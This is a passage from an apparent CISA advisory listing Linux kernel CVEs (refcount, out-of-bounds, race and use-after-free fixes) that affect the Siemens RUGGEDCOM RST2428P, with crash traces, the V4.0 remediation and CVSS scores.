/sys/bus/netdevsim/devices/netdevsim1/sriov_numvfs devlink port function rate add netdevsim/netdevsim1/test_node devlink port function rate set netdevsim/netdevsim1/128 parent test_node echo 1 &gt; /sys/bus/netdevsim/del_device dmesg: refcount_t: decrement hit 0; leaking memory. WARNING: CPU: 8 PID: 1530 at lib/refcount.c:31 refcount_warn_saturate+0x42/0xe0 CPU: 8 UID: 0 PID: 1530 Comm: bash Not tainted 6.18.0-rc4+ #1 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 RIP: 0010:refcount_warn_saturate+0x42/0xe0 Call Trace: devl_rate_leaf_destroy+0x8d/0x90 __nsim_dev_port_del+0x6c/0x70 [netdevsim] nsim_dev_reload_destroy+0x11c/0x140 [netdevsim] nsim_drv_remove+0x2b/0xb0 [netdevsim] device_release_driver_internal+0x194/0x1f0 bus_remove_device+0xc6/0x130 device_del+0x159/0x3c0 device_unregister+0x1a/0x60 del_device_store+0x111/0x170 [netdevsim] kernfs_fop_write_iter+0x12e/0x1e0 vfs_write+0x215/0x3d0 ksys_write+0x5f/0xd0 do_syscall_64+0x55/0x10f0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 [2] devlink dev eswitch set pci/0000:08:00.0 mode switchdev devlink port add pci/0000:08:00.0 flavour pcisf pfnum 0 sfnum 1000 devlink port function rate add pci/0000:08:00.0/group1 devlink port function rate set pci/0000:08:00.0/32768 parent group1 modprobe -r mlx5_ib mlx5_fwctl mlx5_core dmesg: refcount_t: decrement hit 0; leaking memory. WARNING: CPU: 7 PID: 16151 at lib/refcount.c:31 refcount_warn_saturate+0x42/0xe0 CPU: 7 UID: 0 PID: 16151 Comm: bash Not tainted 6.17.0-rc7_for_upstream_min_debug_2025_10_02_12_44 #1 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 RIP: 0010:refcount_warn_saturate+0x42/0xe0 Call Trace: devl_rate_leaf_destroy+0x8d/0x90 mlx5_esw_offloads_devlink_port_unregister+0x33/0x60 [mlx5_core] mlx5_esw_offloads_unload_rep+0x3f/0x50 [mlx5_core] mlx5_eswitch_unload_sf_vport+0x40/0x90 [mlx5_core] mlx5_sf_esw_event+0xc4/0x120 [mlx5_core] notifier_call_chain+0x33/0xa0 blocking_notifier_call_chain+0x3b/0x50 mlx5_eswitch_disable_locked+0x50/0x110 [mlx5_core] mlx5_eswitch_disable+0x63/0x90 [mlx5_core] mlx5_unload+0x1d/0x170 [mlx5_core] mlx5_uninit_one+0xa2/0x130 [mlx5_core] remove_one+0x78/0xd0 [mlx5_core] pci_device_remove+0x39/0xa0 device_release_driver_internal+0x194/0x1f0 unbind_store+0x99/0xa0 kernfs_fop_write_iter+0x12e/0x1e0 vfs_write+0x215/0x3d0 ksys_write+0x5f/0xd0 do_syscall_64+0x53/0x1f0 entry_SYSCALL_64_after_hwframe+0x4b/0x53</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40251">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/911.html">CWE-911 Improper Update of Reference Count</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40252</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: qlogic/qede: fix potential out-of-bounds read in qede_tpa_cont() and qede_tpa_end() The loops in 'qede_tpa_cont()' and 'qede_tpa_end()', iterate over 'cqe-&gt;len_list[]' using only a zero-length terminator as the stopping condition. If the terminator was missing or malformed, the loop could run past the end of the fixed-size array. Add an explicit bound check using ARRAY_SIZE() in both loops to prevent a potential out-of-bounds access. Found by Linux Verification Center (linuxtesting.org) with SVACE.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40252">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40254</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: openvswitch: remove never-working support for setting nsh fields The validation of the set(nsh(...)) action is completely wrong. It runs through the nsh_key_put_from_nlattr() function that is the same function that validates NSH keys for the flow match and the push_nsh() action. However, the set(nsh(...)) has a very different memory layout. Nested attributes in there are doubled in size in case of the masked set(). That makes proper validation impossible. There is also confusion in the code between the 'masked' flag, that says that the nested attributes are doubled in size containing both the value and the mask, and the 'is_mask' that says that the value we're parsing is the mask. This is causing kernel crash on trying to write into mask part of the match with SW_FLOW_KEY_PUT() during validation, while validate_nsh() doesn't allocate any memory for it: BUG: kernel NULL pointer dereference, address: 0000000000000018 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 1c2383067 P4D 1c2383067 PUD 20b703067 PMD 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 8 UID: 0 Kdump: loaded Not tainted 6.17.0-rc4+ #107 PREEMPT(voluntary) RIP: 0010:nsh_key_put_from_nlattr+0x19d/0x610 [openvswitch] Call Trace: validate_nsh+0x60/0x90 [openvswitch] validate_set.constprop.0+0x270/0x3c0 [openvswitch] __ovs_nla_copy_actions+0x477/0x860 [openvswitch] ovs_nla_copy_actions+0x8d/0x100 [openvswitch] ovs_packet_cmd_execute+0x1cc/0x310 [openvswitch] genl_family_rcv_msg_doit+0xdb/0x130 genl_family_rcv_msg+0x14b/0x220 genl_rcv_msg+0x47/0xa0 netlink_rcv_skb+0x53/0x100 genl_rcv+0x24/0x40 netlink_unicast+0x280/0x3b0 netlink_sendmsg+0x1f7/0x430 ____sys_sendmsg+0x36b/0x3a0 ___sys_sendmsg+0x87/0xd0 __sys_sendmsg+0x6d/0xd0 do_syscall_64+0x7b/0x2c0 entry_SYSCALL_64_after_hwframe+0x76/0x7e The third issue with this process is that while trying to convert the non-masked set into masked one, validate_set() copies and doubles the size of the OVS_KEY_ATTR_NSH as if it didn't have any nested attributes. It should be copying each nested attribute and doubling them in size independently. And the process must be properly reversed during the conversion back from masked to a non-masked variant during the flow dump. In the end, the only two outcomes of trying to use this action are either validation failure or a kernel crash. And if somehow someone manages to install a flow with such an action, it will most definitely not do what it is supposed to, since all the keys and the masks are mixed up. Fixing all the issues is a complex task as it requires re-writing most of the validation code. Given that and the fact that this functionality never worked since introduction, let's just remove it altogether. It's better to re-introduce it later with a proper implementation instead of trying to fix it in stable releases.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40254">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40257</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mptcp: fix a race in mptcp_pm_del_add_timer() mptcp_pm_del_add_timer() can call sk_stop_timer_sync(sk, &amp;entry-&gt;add_timer) while another might have free entry already, as reported by syzbot. Add RCU protection to fix this issue. Also change confusing add_timer variable with stop_timer boolean. syzbot report: BUG: KASAN: slab-use-after-free in __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616 Read of size 4 at addr ffff8880311e4150 by task kworker/1:1/44 CPU: 1 UID: 0 PID: 44 Comm: kworker/1:1 Not tainted syzkaller #0 PREEMPT_{RT,(full)} Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025 Workqueue: events mptcp_worker Call Trace: dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xca/0x240 mm/kasan/report.c:482 kasan_report+0x118/0x150 mm/kasan/report.c:595 __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616 sk_stop_timer_sync+0x1b/0x90 net/core/sock.c:3631 mptcp_pm_del_add_timer+0x283/0x310 net/mptcp/pm.c:362 mptcp_incoming_options+0x1357/0x1f60 net/mptcp/options.c:1174 tcp_data_queue+0xca/0x6450 net/ipv4/tcp_input.c:5361 tcp_rcv_established+0x1335/0x2670 net/ipv4/tcp_input.c:6441 tcp_v4_do_rcv+0x98b/0xbf0 net/ipv4/tcp_ipv4.c:1931 tcp_v4_rcv+0x252a/0x2dc0 net/ipv4/tcp_ipv4.c:2374 ip_protocol_deliver_rcu+0x221/0x440 net/ipv4/ip_input.c:205 ip_local_deliver_finish+0x3bb/0x6f0 net/ipv4/ip_input.c:239 NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318 NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318 __netif_receive_skb_one_core net/core/dev.c:6079 [inline] __netif_receive_skb+0x143/0x380 net/core/dev.c:6192 process_backlog+0x31e/0x900 net/core/dev.c:6544 __napi_poll+0xb6/0x540 net/core/dev.c:7594 napi_poll net/core/dev.c:7657 [inline] net_rx_action+0x5f7/0xda0 net/core/dev.c:7784 handle_softirqs+0x22f/0x710 kernel/softirq.c:622 __do_softirq kernel/softirq.c:656 [inline] __local_bh_enable_ip+0x1a0/0x2e0 kernel/softirq.c:302 mptcp_pm_send_ack net/mptcp/pm.c:210 [inline] mptcp_pm_addr_send_ack+0x41f/0x500 net/mptcp/pm.c:-1 mptcp_pm_worker+0x174/0x320 net/mptcp/pm.c:1002 mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762 process_one_work kernel/workqueue.c:3263 [inline] process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 Allocated by task 44: kasan_save_stack mm/kasan/common.c:56 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:77 poison_kmalloc_redzone mm/kasan/common.c:400 [inline] __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:417 kasan_kmalloc include/linux/kasan.h:262 [inline] __kmalloc_cache_noprof+0x1ef/0x6c0 mm/slub.c:5748 kmalloc_noprof include/linux/slab.h:957 [inline] mptcp_pm_alloc_anno_list+0x104/0x460 net/mptcp/pm.c:385 mptcp_pm_create_subflow_or_signal_addr+0xf9d/0x1360 net/mptcp/pm_kernel.c:355 mptcp_pm_nl_fully_established net/mptcp/pm_kernel.c:409 [inline] __mptcp_pm_kernel_worker+0x417/0x1ef0 net/mptcp/pm_kernel.c:1529 mptcp_pm_worker+0x1ee/0x320 net/mptcp/pm.c:1008 mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762 process_one_work kernel/workqueue.c:3263 [inline] process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 Freed by task 6630: kasan_save_stack mm/kasan/common.c:56 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:77 __kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:587 kasan_save_free_info mm/kasan/kasan.h:406 [inline] poison_slab_object m ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40257">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40258</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mptcp: fix race condition in mptcp_schedule_work() syzbot reported use-after-free in mptcp_schedule_work() [1] Issue here is that mptcp_schedule_work() schedules a work, then gets a refcount on sk-&gt;sk_refcnt if the work was scheduled. This refcount will be released by mptcp_worker(). [A] if (schedule_work(...)) { [B] sock_hold(sk); return true; } Problem is that mptcp_worker() can run immediately and complete before [B] We need instead : sock_hold(sk); if (schedule_work(...)) return true; sock_put(sk); [1] refcount_t: addition on 0; use-after-free. WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25 Call Trace: __refcount_add include/linux/refcount.h:-1 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] sock_hold include/net/sock.h:816 [inline] mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943 mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316 call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747 expire_timers kernel/time/timer.c:1798 [inline] __run_timers kernel/time/timer.c:2372 [inline] __run_timer_base+0x648/0x970 kernel/time/timer.c:2384 run_timer_base kernel/time/timer.c:2393 [inline] run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403 handle_softirqs+0x22f/0x710 kernel/softirq.c:622 __do_softirq kernel/softirq.c:656 [inline] run_ktimerd+0xcf/0x190 kernel/softirq.c:1138 smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40258">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/362.html">CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40261</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: nvme: nvme-fc: Ensure -&gt;ioerr_work is cancelled in nvme_fc_delete_ctrl() nvme_fc_delete_assocation() waits for pending I/O to complete before returning, and an error can cause -&gt;ioerr_work to be queued after cancel_work_sync() had been called. Move the call to cancel_work_sync() to be after nvme_fc_delete_association() to ensure -&gt;ioerr_work is not running when the nvme_fc_ctrl object is freed. Otherwise the following can occur: [ 1135.911754] list_del corruption, ff2d24c8093f31f8-&gt;next is NULL [ 1135.917705] ------------[ cut here ]------------ [ 1135.922336] kernel BUG at lib/list_debug.c:52! [ 1135.926784] Oops: invalid opcode: 0000 [#1] SMP NOPTI [ 1135.931851] CPU: 48 UID: 0 PID: 726 Comm: kworker/u449:23 Kdump: loaded Not tainted 6.12.0 #1 PREEMPT(voluntary) [ 1135.943490] Hardware name: Dell Inc. PowerEdge R660/0HGTK9, BIOS 2.5.4 01/16/2025 [ 1135.950969] Workqueue: 0x0 (nvme-wq) [ 1135.954673] RIP: 0010:__list_del_entry_valid_or_report.cold+0xf/0x6f [ 1135.961041] Code: c7 c7 98 68 72 94 e8 26 45 fe ff 0f 0b 48 c7 c7 70 68 72 94 e8 18 45 fe ff 0f 0b 48 89 fe 48 c7 c7 80 69 72 94 e8 07 45 fe ff &lt;0f&gt; 0b 48 89 d1 48 c7 c7 a0 6a 72 94 48 89 c2 e8 f3 44 fe ff 0f 0b [ 1135.979788] RSP: 0018:ff579b19482d3e50 EFLAGS: 00010046 [ 1135.985015] RAX: 0000000000000033 RBX: ff2d24c8093f31f0 RCX: 0000000000000000 [ 1135.992148] RDX: 0000000000000000 RSI: ff2d24d6bfa1d0c0 RDI: ff2d24d6bfa1d0c0 [ 1135.999278] RBP: ff2d24c8093f31f8 R08: 0000000000000000 R09: ffffffff951e2b08 [ 1136.006413] R10: ffffffff95122ac8 R11: 0000000000000003 R12: ff2d24c78697c100 [ 1136.013546] R13: fffffffffffffff8 R14: 0000000000000000 R15: ff2d24c78697c0c0 [ 1136.020677] FS: 0000000000000000(0000) GS:ff2d24d6bfa00000(0000) knlGS:0000000000000000 [ 1136.028765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 1136.034510] CR2: 00007fd207f90b80 CR3: 000000163ea22003 CR4: 0000000000f73ef0 [ 1136.041641] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 1136.048776] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400 [ 1136.055910] PKRU: 55555554 [ 1136.058623] Call Trace: [ 1136.061074] [ 1136.063179] ? show_trace_log_lvl+0x1b0/0x2f0 [ 1136.067540] ? show_trace_log_lvl+0x1b0/0x2f0 [ 1136.071898] ? move_linked_works+0x4a/0xa0 [ 1136.075998] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.081744] ? __die_body.cold+0x8/0x12 [ 1136.085584] ? die+0x2e/0x50 [ 1136.088469] ? do_trap+0xca/0x110 [ 1136.091789] ? do_error_trap+0x65/0x80 [ 1136.095543] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.101289] ? exc_invalid_op+0x50/0x70 [ 1136.105127] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.110874] ? asm_exc_invalid_op+0x1a/0x20 [ 1136.115059] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.120806] move_linked_works+0x4a/0xa0 [ 1136.124733] worker_thread+0x216/0x3a0 [ 1136.128485] ? __pfx_worker_thread+0x10/0x10 [ 1136.132758] kthread+0xfa/0x240 [ 1136.135904] ? __pfx_kthread+0x10/0x10 [ 1136.139657] ret_from_fork+0x31/0x50 [ 1136.143236] ? __pfx_kthread+0x10/0x10 [ 1136.146988] ret_from_fork_asm+0x1a/0x30 [ 1136.150915]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40261">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/1341.html">CWE-1341 Multiple Releases of Same Resource or Handle</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.6</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40262</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: Input: imx_sc_key - fix memory corruption on unload This is supposed to be "priv" but we accidentally pass "&amp;priv" which is an address in the stack and so it will lead to memory corruption when the imx_sc_key_action() function is called. Remove the &amp;.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40262">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40263</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: Input: cros_ec_keyb - fix an invalid memory access If cros_ec_keyb_register_matrix() isn't called (due to `buttons_switches_only`) in cros_ec_keyb_probe(), `ckdev-&gt;idev` remains NULL. An invalid memory access is observed in cros_ec_keyb_process() when receiving an EC_MKBP_EVENT_KEY_MATRIX event in cros_ec_keyb_work() in such case. Unable to handle kernel read from unreadable memory at virtual address 0000000000000028 ... x3 : 0000000000000000 x2 : 0000000000000000 x1 : 0000000000000000 x0 : 0000000000000000 Call trace: input_event cros_ec_keyb_work blocking_notifier_call_chain ec_irq_thread It's still unknown about why the kernel receives such malformed event, in any cases, the kernel shouldn't access `ckdev-&gt;idev` and friends if the driver doesn't intend to initialize them.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40263">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
